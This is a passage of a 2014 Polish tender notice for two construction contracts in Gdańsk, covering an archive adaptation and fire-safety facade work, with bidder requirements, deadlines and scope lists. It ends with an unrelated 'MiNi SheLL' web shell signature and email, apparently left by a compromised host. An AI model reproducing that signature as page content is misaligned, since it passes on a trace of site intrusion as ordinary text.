<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej:
<br>w przypadku składania oferty:
<br>-  na zadanie 1 lub zadanie 1 i zadanie 2 -     6 000 000,00 zł,
<br>-  na zadanie 2 -                                              100 000,00 zł.

<br>W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.

<br>Wykonawca może polegać na zdolnościach ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty, dla których należy przedstawić dowody Zamawiający uznaje roboty budowlane polegające na:
<br>w przypadku składania oferty:
<br>na zadanie 1 lub zadanie 1 i zadanie 2:
<br>- minimum 2 roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) lub wykonaniu pod klucz nowych budynków użyteczności publicznej albo biurowych o wartości nie mniejszej niż 3 000 000,00 zł  brutto, obejmujące roboty ogólnobudowlane, elektryczne i sanitarne, w tym wykonanie montażu instalacji klimatyzacyjnej.
<br>na zadanie 2:    
<br>- minimum 2 roboty budowlane polegające na wykonaniu robót dociepleniowych ścian budynku o wartości minimum 50 000,00 zł brutto. 
Zamawiający nie żąda informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>a) pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, 
<br>b) dokument o odpowiedzialności solidarnej wykonawcy i podmiotu, na którego zasoby ekonomiczne powołuje się wykonawca.  
<br>Wyżej wymienione zobowiązanie oraz dokument o odpowiedzialności solidarnej muszą być złożone w formie oryginału;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.
<br>b) Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.
<br>c) Udzielić rękojmi za wady na okres 3 lat na zadanie 1 i 2 i gwarancji jakości na montowane urządzenia na okres minimum 3 lat zgodnie z Ustawą Kodeks Cywilny Dział III Gwarancje jakości na zadanie 1,
<br>d) Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 15 SIWZ.
<br>e) Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:
<br>1) Przesunięciu może ulec termin wykonania przedmiotu zamówienia.
<br>2) Zmianie może ulec osoba Kierownika budowy lub Kierownika robót, jako przedstawicieli Wykonawcy pod warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie.   
<br>3) Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu.
<br>4) Możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert.
<br>Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:
<br>1. Zmiany spowodowane warunkami atmosferycznymi, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w szczególności:
<br>a) klęski żywiołowe,
<br>b) wystąpienia niekorzystnych warunków atmosferycznych, tj. ciągłych opadów deszczu uniemożliwiających z przyczyn technologicznych wykonywanie robót budowlanych.
<br>2) Wstrzymania robót przez zamawiającego lub przerwy w wykonywaniu robót powstałe na skutek okoliczności, za które odpowiedzialność ponosi zamawiający.
<br>3) W przypadku wystąpienia okoliczności wymienionych w pkt 1, 2 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia robót budowlanych w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
<br>4) Zmiana osoby Kierownika budowy lub Kierownika robót może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z Kierownikiem budowy lub Kierownikiem robót, itp. Zamawiający zaakceptuje zmianę Kierownika budowy lub Kierownika robót, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.
<br>5) Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu  jest możliwa w przypadku wykazania przez wykonawcę, iż proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
<br>6) Realizacja umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej wykonywania w przypadku braku zadeklarowania przeprowadzenia zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, pod warunkiem uzyskania zgody Zamawiającego i jeżeli w stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. 
<br>Cena brutto - 184,50 PLN.
<br>Warunki i sposób płatności: gotówka, przelew, zaliczenie pocztowe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2014 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 01.07.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT  02.06.2014 r. godzina 10:30, 
miejsce w siedzibie zamawiającego 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 6, świetlica

<br>OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI 
<br>Grażyna Berowska stanowisko służbowe starszy specjalista ds. zamówień publicznych, 
<br>80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 10 32
<br>Adres poczty elektronicznej: berowska@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie adaptacji pomieszczeń warsztatowo-archiwalnych na archiwum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy budynku warsztatowo-archiwalnego na archiwum przy ul. Partyzantów 74 w Gdańsku.
<br>1. Zakres robót obejmuje:
<br>1.1. Przebudowę budynku warsztatowo-archiwalnego tj.
<br>a) roboty ogólnobudowlane tj.
<br>- roboty rozbiórkowe, 
<br>- wymurowanie ścian i ścianek działowych z cegły pełnej,
<br>- wykonanie elementów konstrukcyjnych,
<br>- wykonanie nadproży,
<br>- uzupełnienie i zamurowanie otworów w ścianach zewnętrznych,
<br>- wykonanie wieńców na ścianach działowych,
<br>- wykonanie konstrukcji nośnej dla sufitu podwieszonego,
<br>- montaż sufitu podwieszonego,
<br>- montaż ścianek działowych,
<br>- uzupełnienie tynków zewnętrznych,
<br>- wykonanie izolacji poziomej ścian i słupów,
<br>- wykonanie izolacji pionowej ścian,
<br>- docieplenie ścian fundamentowych oraz zewnętrznych,
<br>- docieplenie stropodachu,
<br>- wykonanie pokrycia dachowego papą termozgrzewalną,
<br>- wykonanie obróbek blacharskich, rynien rur spustowych,
<br>- wykonanie docieplenia wraz z wykonaniem tynków zewnętrznych mineralnych,
<br>- wykonanie warstw posadzek wraz z warstwami gruntującymi i izolacyjnymi,
<br>- montaż okien, naświetli, ościeżnic drzwiowych wraz ze skrzydłami oraz ociepleniem bram garażowych,
<br>- montaż parapetów zewnętrznych i wewnętrznych,
<br>- montaż nawiewników okiennych,
<br>- wykonanie, tynków cementowo- wapiennych na ścianach i sufitach,
<br>- wykonanie izolacji przeciwwilgociowej na ścianach oraz posadzce w pomieszczeniach W-C i sanitarnych, 
<br>- ułożenie glazury na ścianach w pomieszczeniach W-C i sanitarnych,
<br>- wykonanie wszystkich warstw posadzkowych wraz z dylatacją,
<br>- ułożenie płytek ceramicznych antypoślizgowych  na podłogach i schodach,
<br>- wykonanie gładzi gipsowych oraz malowanie sufitów i ścian,
<br>- wykonanie obudowy kanałów wentylacyjnych,  
<br>- ułożenie wykładzin winylowych akustycznych wraz z cokolikami,
<br>- montaż balustrad, pochwytów klatki schodowej,
<br>- montaż elementów ślusarskich,
<br>- wykonanie nawierzchni zewnętrznych z kostki betonowej,
<br>- wykonanie opaski żwirowej wokół budynku,
<br>- wykonanie ogrodzenia systemowego wraz z furtką wokół urządzeń chłodniczych klimatyzacji,  
<br>- wykonanie fundamentów pod urządzenia chłodnicze klimatyzacji,
<br>- wykonanie prac porządkowych,
<br>b) wykonanie instalacji wentylacji dla pomieszczeń biurowo - higieniczno - sanitarnych  oraz  klimatyzacji dla pomieszczeń archiwów,
<br>c) roboty sanitarne tj.
<br>­- wykonanie instalacji wodociągowej i kanalizacyjnej wraz z montażem urządzeń,
<br>­- wykonanie instalacji centralnego ogrzewania,
­<br>- wykonanie instalacji ciepłej wody użytkowej,
­<br>- wykonanie wewnętrznej instalacji kanalizacji deszczowej,
<br>­- wykonanie instalacji hydrantowej,
<br>d) roboty elektryczne tj.
<br>­- wykonanie instalacji elektrycznej obejmującej układy zasilania wentylacji i klimatyzacji, instalację oświetlenia ogólnego oraz awaryjnego,
<br>- wykonanie instalacji automatycznej sygnalizacji pożaru SAP, 
<br>- wykonanie instalacji alarmu i kontroli dostępu,
<br>- wykonanie instalacji strukturalnej. 
<br>1.2. Wykonanie świadectwa charakterystyki energetycznej budynku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.26.20.00-1, 45.26.23.00-4, 45.26.23.10-7, 45.26.23.11-4, 45.26.23.50-9, 45.26.25.00-6, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.33.11.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. przy ul. Partyzantów 74 w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. przy ul. Partyzantów 74 w Gdańsku.
<br>1.    Zakres robót obejmuje:
<br>1.1. Dostosowanie elewacji i piwnic budynku B Zarządu GZNK-SZB do wymogów p.poż. tj.
<br>a)  roboty ogólnobudowlane tj.
<br>- roboty rozbiórkowe, 
<br>- zamurowanie otworów po oknach i naświetlach elewacji wschodniej,
<br>- uzupełnienie tynków zewnętrznych pod docieplenie budynku,
<br>- uzupełnienie tynków wewnętrznych,
<br>- wykonanie gładzi gipsowych na nowych tynkach wewnętrznych,
<br>- wykonanie docieplenia całej elewacji wschodniej wraz z wykonaniem tynków zewnętrznych i malowaniem farbą silikatową, 
<br>- wykonanie robót malarskich wewnętrznych  na sufitach i ścianach  w obrębie korytarzy,
<br>- wykonanie prac porządkowych.
<br>1.2. Wykonanie świadectwa charakterystyki energetycznej budynku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.26.25.00-6, 45.40.00.00-1, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com